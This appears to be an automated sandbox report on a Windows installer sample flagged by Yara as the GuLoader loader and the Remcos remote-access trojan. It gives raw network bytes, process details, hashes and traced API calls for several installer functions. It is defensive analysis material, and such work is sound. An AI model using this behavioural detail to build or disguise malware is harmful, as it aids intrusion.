2025-01-14 14:42:21 UTC	8000	IN	Data Raw: e6 b7 0d 40 8b 1e d8 64 6c d9 a2 d6 72 bd 50 85 29 57 23 a8 f7 4d 56 51 67 ff 06 88 a0 83 5f 65 f0 f8 fa 19 6a fb f3 9b 97 b5 30 da e0 34 bc 86 43 62 50 0d 98 a4 49 5b e4 ac 8d 19 a9 79 5b d7 09 ec f8 3c 05 93 f3 33 1b 7f f3 4d 11 6d 44 c1 12 f1 00 a2 90 41 4d 0c 00 49 0b d7 d2 54 b6 d8 7e 71 83 65 e9 42 89 b6 8c 9c 5d 40 66 6c 12 8c 8d 8e 16 05 fb 7d 5e 9f 0b 78 32 92 17 d2 f5 44 0f b2 71 1f 1d 71 e1 85 2c 23 4e 49 f3 84 c6 28 da 50 62 49 97 8e 70 74 fd d8 09 df 66 6c 07 4a b4 80 fb af 92 85 9a 18 f7 df b0 81 fc f9 6a 4f 30 57 43 36 a6 ab 93 39 15 7a 89 87 76 e8 aa d4 76 0e 3b 96 3c c0 0b d9 14 94 a3 3b e0 e4 57 08 08 87 9a 35 bb ef 80 5c f5 53 6c d5 8b ed 80 cb 58 38 c2 4e 69 40 69 7a 80 8d 93 d5 a6 a9 c8 ef 33 34 b5 1a 3f 37 41 ad e6 1c bd f0 1f 79 73 Data Ascii: @dlrP)W#MVQg_ej04CbPI[y[<3MmDAMIT~qeB]@fl}^x2Dqq,#NI(PbIptflJjO0WC69zvv;<;W5\SlX8Ni@iz34?7Ays
2025-01-14 14:42:21 UTC	8000	IN	Data Raw: f1 54 97 8d 24 06 d5 1c 60 45 f2 66 ee 49 f5 64 db 33 93 03 7c 25 b1 59 98 b4 3a 26 56 a6 3f 9a 3a f3 1e aa 4f 76 dc 87 e4 c3 ad a4 ac 05 aa 86 e2 cc a1 f0 20 3b a0 98 c5 02 25 21 8b ef 0b 50 d7 91 c9 a3 83 22 a9 02 f8 d5 97 17 85 0e 0b 0d 5b b9 d2 3c 9c c3 14 19 72 39 c9 6c 32 67 99 d7 91 5b f7 19 31 65 53 93 68 02 d2 b6 94 3a b2 be c1 9e 1a 72 0b d8 29 4d 2e 6a 6c 54 cf ac ba 5d 65 d6 fc 9d 9d 74 4a e4 c7 7f 57 29 f4 1f 13 1d 21 7c c0 f2 0b d0 0c 50 74 f1 73 e3 68 3b fa bf 33 bc 89 58 6f 66 fc 64 d7 f7 93 05 2e e3 99 8e 4a 3e 67 ac c4 b0 0b 40 dd a0 0d 80 91 8f 8a 2d 76 a3 e1 70 4f f7 60 c9 da 5c ab 46 56 c5 19 4b e8 bf 17 15 02 ca 24 b7 0b f3 ca 82 bf 7c 5d 51 1b ec 97 41 93 23 6d 3e ad 24 c7 89 6c 29 6f 14 88 4f ab 52 43 39 43 18 5f 0a 65 3a 54 9b 01 Data Ascii: T$`EfId3\|%Y:&V?:Ov ;%!P"[<r9l2g[1eSh:r)M.jlT]etJW)!\|Ptsh;3Xofd.J>g@-vpO`\FVK$\|]QA#m>$l)oORC9C_e:T
2025-01-14 14:42:21 UTC	8000	IN	Data Raw: bf e7 84 d7 32 13 db 41 22 ad 47 26 44 8c 21 ed 4a 2c 45 f5 71 bd 43 2d 7b 48 ee 56 66 a4 d5 90 28 1c 67 4f d9 97 f5 42 bc 53 91 8c c2 2f 4b a2 4e 56 7e fa ed 5a 96 e2 ae bc 7d f0 05 da 70 56 16 24 62 97 53 fe 59 81 59 89 28 52 bb 45 d7 f1 e1 e1 e3 86 37 c1 e5 ba 67 dc f5 f3 8f 43 64 ba 53 c3 82 7f 3c 48 a9 3c 8e c6 cf 91 ec 56 cc 2b df 1d 7b cf f4 5d ed 69 8a 92 90 17 0b 0b 32 2a 27 b1 d8 6d 12 5a d9 15 89 7f 83 d9 45 5a 5b 13 f6 dc 7a dc 68 3f 51 40 b5 42 4e 8c 5e 55 74 a6 75 99 ac 9f 86 f8 e8 01 e2 5b a1 94 97 df 3f 01 8a 32 53 5f ad 32 3d 88 de 65 c5 ea ff 6b 4b e2 a4 dc 2f f9 f0 6b 23 a3 a3 b7 58 65 98 8e 2a 09 b6 89 cf 20 6b 2a 28 67 ca be 5d 35 c4 71 cc 55 15 72 f3 ea 11 e1 c0 ef 91 a8 46 11 b0 17 b8 84 9c 5b 7f 96 50 8e 2e 4a 74 a1 81 98 67 be 56 Data Ascii: 2A"G&D!J,EqC-{HVf(gOBS/KNV~Z}pV$bSYY(RE7gCdS<H<V+{]i2'mZEZ[zh?Q@BN^Utu[?2S_2=ekK/k#Xe k*(g]5qUrF[P.JtgV

Target ID:	0
Start time:	09:39:57
Start date:	14/01/2025
Path:	C:\Users\user\Desktop\x6yDsHJ9tr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\x6yDsHJ9tr.exe"
Imagebase:	0x400000
File size:	550'217 bytes
MD5 hash:	25EEC63EDF7C0EB8628A89712B5CB363
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.3373583635.0000000006C89000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:42:05
Start date:	14/01/2025
Path:	C:\Users\user\Desktop\x6yDsHJ9tr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\x6yDsHJ9tr.exe"
Imagebase:	0x400000
File size:	550'217 bytes
MD5 hash:	25EEC63EDF7C0EB8628A89712B5CB363
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4594924412.00000000368EE000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4573553882.0000000006AE4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4573553882.0000000006B13000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	15.7%
Dynamic/Decrypted Code Coverage:	13.4%
Signature Coverage:	15.9%
Total number of Nodes:	1606
Total number of Limit Nodes:	33

Executed Functions

Function 00403645 Relevance: 88.0, APIs: 32, Strings: 18, Instructions: 464
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00403668
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403693
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004036A6
lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040373F
#17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040377C
OleInitialize.OLE32(00000000), ref: 00403783
SHGetFileInfoW.SHELL32(00420F08,00000000,?,000002B4,00000000), ref: 004037A2
GetCommandLineW.KERNEL32(00428A60,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037B7
CharNextW.USER32(00000000,"C:\Users\user\Desktop\x6yDsHJ9tr.exe",00000020,"C:\Users\user\Desktop\x6yDsHJ9tr.exe",00000000,?,00000008,0000000A,0000000C), ref: 004037F0
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403928
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403939
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403945
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403959
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403961
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403972
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040397A
DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040398E
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\x6yDsHJ9tr.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A67

Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F

wsprintfW.USER32 ref: 00403AC4
GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 00403AF7
DeleteFileW.KERNEL32(0042C800), ref: 00403B03
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B31

Part of subcall function 00406442: MoveFileExW.KERNEL32(?,?,00000005,00405F40,?,00000000,000000F1,?,?,?,?,?), ref: 0040644C

CopyFileW.KERNEL32(C:\Users\user\Desktop\x6yDsHJ9tr.exe,0042C800,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403B47

Part of subcall function 00405C65: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
Part of subcall function 00405C65: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B

Part of subcall function 004069DF: FindFirstFileW.KERNELBASE(75923420,00425F98,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,004060A2,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,00000000,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0), ref: 004069EA
Part of subcall function 004069DF: FindClose.KERNEL32(00000000), ref: 004069F6

OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B95
ExitProcess.KERNEL32 ref: 00403BB2
CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403BB9
GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BD5
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403BDC
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BF1
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C14
ExitWindowsEx.USER32(00000002,80040002), ref: 00403C39
ExitProcess.KERNEL32 ref: 00403C5C

Part of subcall function 00405C30: CreateDirectoryW.KERNELBASE(?,00000000,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405C36

Strings

\Temp, xrefs: 0040393F
user32::EnumWindows(i r1 ,i 0), xrefs: 00403A72
TEMP, xrefs: 0040396D
"C:\Users\user\Desktop\x6yDsHJ9tr.exe", xrefs: 004037BD, 004037C3, 004037D8, 004039B6
~nsu%X.tmp, xrefs: 00403ABB
NSIS Error, xrefs: 004037A8
C:\Users\user\Desktop, xrefs: 00403A85
C:\Users\user\Desktop\x6yDsHJ9tr.exe, xrefs: 00403B42
TMP, xrefs: 00403975
C:\Users\user\AppData\Local\Temp\, xrefs: 0040391D, 00403922, 00403938, 00403944, 00403953, 00403960, 0040396C, 00403974, 00403A62, 00403AE3, 00403B0F, 00403B30, 00403B39
1033, xrefs: 00403989
C:\Users\user\eftermodnendes\ringeagt, xrefs: 0040390D, 00403A2F, 00403A7C, 00403A8A
UXTHEME, xrefs: 00403733, 00403738, 0040373E
C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet, xrefs: 00403A3A
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040365C
SeShutdownPrivilege, xrefs: 00403BEB
Low, xrefs: 0040395B
Error launching installer, xrefs: 00403A10

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
String ID: "C:\Users\user\Desktop\x6yDsHJ9tr.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\x6yDsHJ9tr.exe$C:\Users\user\eftermodnendes\ringeagt$C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$user32::EnumWindows(i r1 ,i 0)$~nsu%X.tmp
API String ID: 1813718867-642564250
Opcode ID: 0478bff6c520e1fcae09ae2a6132b709cffae3f0026663cdf2ec71cee886cdca
Instruction ID: d2a3103bd0adf94391fd0ebfa47e937d37e61a7cc597b22c14a72094b2238e17
Opcode Fuzzy Hash: 0478bff6c520e1fcae09ae2a6132b709cffae3f0026663cdf2ec71cee886cdca
Instruction Fuzzy Hash: 4CF1E531604300AAD320AF759D05B2B7EE8AB8570AF11483FF585B22D1DB7C9A41CB6E

Function 00405D8E Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,75923420,75922EE0,"C:\Users\user\Desktop\x6yDsHJ9tr.exe"), ref: 00405DB7
lstrcatW.KERNEL32(00424F50,\*.*,00424F50,?,?,75923420,75922EE0,"C:\Users\user\Desktop\x6yDsHJ9tr.exe"), ref: 00405DFF
lstrcatW.KERNEL32(?,0040A014,?,00424F50,?,?,75923420,75922EE0,"C:\Users\user\Desktop\x6yDsHJ9tr.exe"), ref: 00405E22
lstrlenW.KERNEL32(?,?,0040A014,?,00424F50,?,?,75923420,75922EE0,"C:\Users\user\Desktop\x6yDsHJ9tr.exe"), ref: 00405E28
FindFirstFileW.KERNEL32(00424F50,?,?,?,0040A014,?,00424F50,?,?,75923420,75922EE0,"C:\Users\user\Desktop\x6yDsHJ9tr.exe"), ref: 00405E38
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ED8
FindClose.KERNEL32(00000000), ref: 00405EE7

Strings

POB, xrefs: 00405DE7
"C:\Users\user\Desktop\x6yDsHJ9tr.exe", xrefs: 00405D97
\*.*, xrefs: 00405DF9

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\x6yDsHJ9tr.exe"$POB$\*.*
API String ID: 2035342205-234688369
Opcode ID: 3d2f7fed8d6250162ff3c39f7b63e528597fb1dc0209ffdda96aed75cda8f6cd
Instruction ID: 5ad7ae4105776224b4bb644c15053e07d5ebc7bd6c5330578b1f64027da07968
Opcode Fuzzy Hash: 3d2f7fed8d6250162ff3c39f7b63e528597fb1dc0209ffdda96aed75cda8f6cd
Instruction Fuzzy Hash: 6F41D330400A15AACB21AB65CC49BBF7678EF41718F24417FF895B11C1D77C4A82DEAE

Function 00406DA0 Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef02b19721ac815a4354a2b384e5822db0a29b40c19b0eeafe3a712687496ea
Instruction ID: 5203db86b2e08fd3ebfde089d8ff8c44169432d1db75552ad8ea7513f2b1afa9
Opcode Fuzzy Hash: 3ef02b19721ac815a4354a2b384e5822db0a29b40c19b0eeafe3a712687496ea
Instruction Fuzzy Hash: 64F16570D04229CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A86CF45

Function 004069DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(75923420,00425F98,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,004060A2,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,00000000,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0), ref: 004069EA
FindClose.KERNEL32(00000000), ref: 004069F6

Strings

C:\Users\user\AppData\Local\Temp\nspD8D5.tmp, xrefs: 004069DF

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nspD8D5.tmp
API String ID: 2295610775-917692060
Opcode ID: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
Instruction ID: 87b64c9cece2c57c139ea7904c9da033401fae8fb112df8880c97ca139bbac6e
Opcode Fuzzy Hash: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
Instruction Fuzzy Hash: EBD012716096205BD64067386E0C94B7A589F16331722CA36F06BF21E0D7348C628A9C

Function 00403D54 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406A76: GetModuleHandleA.KERNEL32(?,00000020,?,00403755,0000000C,?,?,?,?,?,?,?,?), ref: 00406A88
Part of subcall function 00406A76: GetProcAddress.KERNEL32(00000000,?), ref: 00406AA3

lstrcatW.KERNEL32(1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\x6yDsHJ9tr.exe",00008001), ref: 00403DD5
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\eftermodnendes\ringeagt,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,75923420), ref: 00403E55
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\eftermodnendes\ringeagt,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000), ref: 00403E68
GetFileAttributesW.KERNEL32(Call), ref: 00403E73
LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\eftermodnendes\ringeagt), ref: 00403EBC

Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6

RegisterClassW.USER32(00428A00), ref: 00403EF9
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F11
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F46
ShowWindow.USER32(00000005,00000000), ref: 00403F7C
GetClassInfoW.USER32(00000000,RichEdit20W,00428A00), ref: 00403FA8
GetClassInfoW.USER32(00000000,RichEdit,00428A00), ref: 00403FB5
RegisterClassW.USER32(00428A00), ref: 00403FBE
DialogBoxParamW.USER32(?,00000000,00404102,00000000), ref: 00403FDD

Strings

RichEd20, xrefs: 00403F82
"C:\Users\user\Desktop\x6yDsHJ9tr.exe", xrefs: 00403D57
H/B, xrefs: 00403D80
Control Panel\Desktop\ResourceLocale, xrefs: 00403D88
.DEFAULT\Control Panel\International, xrefs: 00403DC0
RichEdit20W, xrefs: 00403FA0, 00403FA6
C:\Users\user\AppData\Local\Temp\, xrefs: 00403D59
1033, xrefs: 00403D74, 00403DD0
C:\Users\user\eftermodnendes\ringeagt, xrefs: 00403DE4, 00403DEC, 00403E8F, 00403E95, 00403EA5
RichEdit, xrefs: 00403FAF
RichEd32, xrefs: 00403F90
Call, xrefs: 00403E1C, 00403E25, 00403E33, 00403E82, 00403E88
_Nb, xrefs: 00403ED8, 00403F40
.exe, xrefs: 00403E62

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\x6yDsHJ9tr.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\eftermodnendes\ringeagt$Call$Control Panel\Desktop\ResourceLocale$H/B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-1154611725
Opcode ID: 1dbc0aa764a7a3bc96806bc1c5cdbb5ab10d7d6512463466f43f37ee2b0e4de0
Instruction ID: 33830a549d8bd1c9ff3d4095a28b7d5feb3a0022977f60bfd4e6bbc11b1c7dcb
Opcode Fuzzy Hash: 1dbc0aa764a7a3bc96806bc1c5cdbb5ab10d7d6512463466f43f37ee2b0e4de0
Instruction Fuzzy Hash: 4661D570200741BAD620AB669E46F2B3A7CEB84709F41453FFA45B61E2DF795902CB2D

Function 004030D5 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 204
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004030E9
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\x6yDsHJ9tr.exe,00000400), ref: 00403105

Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,C:\Users\user\Desktop\x6yDsHJ9tr.exe,80000000,00000003), ref: 00406176
Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406198

GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\x6yDsHJ9tr.exe,C:\Users\user\Desktop\x6yDsHJ9tr.exe,80000000,00000003), ref: 0040314E
GlobalAlloc.KERNEL32(00000040,00008001), ref: 00403290

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403327
C:\Users\user\AppData\Local\Temp\, xrefs: 004030DF, 004032A8
"C:\Users\user\Desktop\x6yDsHJ9tr.exe", xrefs: 004030DE
soft, xrefs: 004031C3
C:\Users\user\Desktop, xrefs: 00403130, 00403135, 0040313B
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032D9
C:\Users\user\Desktop\x6yDsHJ9tr.exe, xrefs: 004030EF, 004030FE, 00403112, 0040312F
Inst, xrefs: 004031BA
Null, xrefs: 004031CC
Error launching installer, xrefs: 00403125

Memory Dump Source

Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
